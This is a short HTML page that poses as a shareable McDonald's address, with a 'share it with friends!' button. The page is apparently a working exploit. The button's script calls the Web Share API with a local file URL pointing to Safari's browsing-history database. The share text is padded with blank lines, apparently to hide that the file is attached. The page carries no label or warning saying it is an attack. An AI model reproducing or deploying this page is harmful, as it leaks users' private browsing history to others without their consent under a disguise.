
<html>
<script>
var opts = {text: 'Address:McDonalds headquarters in 11-59 HIGH RD, EAST FINCHLEY, LONDON N2 8AW, UNITED KINGDOM\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n', url: 'file:///private/var/mobile/Library/Safari/History.db'};

function run() {
	navigator.share(opts);
}
</script>
<body>
<p>Address:McDonald's headquarters in 11-59 HIGH RD, EAST FINCHLEY, LONDON N2 8AW, UNITED KINGDOM</p>
<br/>
<img src="https://www.mcdonalds.com/is/image/content/dam/uk/nfl/promo/desktopnfl/dqpc-homepage-pb-full-v2.jpg?">
<br/>
<button onclick='run();'>share it with friends!</button>
</body>
</html>
